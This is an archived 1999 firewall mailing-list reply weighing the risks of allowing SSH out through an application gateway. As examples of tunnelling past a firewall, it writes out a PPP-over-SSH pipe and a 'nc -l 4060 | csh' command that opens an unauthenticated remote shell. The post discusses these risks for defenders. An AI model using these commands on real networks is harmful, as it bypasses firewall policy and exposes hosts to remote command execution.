Firewall Wizards mailing list archives

Re: SSH through firewall

From: James Neal - HandiCAT <neal () ee pdx edu>
Date: Mon, 05 Jul 1999 21:24:48 -0700

In message <782FA6543FA5D111933D0000F86AEFA8019AA0C1 () simail5 si bosch de>you wr
ite:
I'm thinking about allowing users in the trusted network to do ssh
through a non-transparent application gateway firewall into an
untrusted network.
Do you think this is "secure"? I'm not sure because users can tunnel
all kinds of protocols in ssh. What would be possible attacks?

Given the alternatives (ftp and telnet), I'd say SSH is a wonderful
choice.

That being said, some of "The bad" of SSH.
  o  Straight ssh-- directly from the source at ftp.cs.hut.fi-- allows
  users to forward ports from the outside machine across their secure
  channel to arbitrary ports on hosts inside your firewall.

  o  It's quite possible to run PPP over SSH.   In fact, there's a HOWTO
  about doing just that in the Linux world. It's basically just a
  # ssh remotehost pppd | pppd

  o  Related to the first two items.  There's nothing keeping a user
  from doing an "ssh remotehost nc -l 4060 | csh", to allow people to
  run shell commands by just connecting to port 4060 of the remote
  machine.

Of course, tools exist that allow one to bypass a firewall using HTTP,
telnet, and the r* services as well, so if you /do/ allow SSH through,
at least thier hax0r packets will be going over an encrypted tunnel and
not being sniffed or hujacked. :)

Do you think this is feasible with a non-transparent firewall? Do you know
a firewall that is capable of this?

Urg.. Beats me.  I don't even know how SSH would function over a
non-transparent firewall.

-James

--
James Neal <jfneal () intermedia com>
Senior Systems Administrator - Intermedia Communications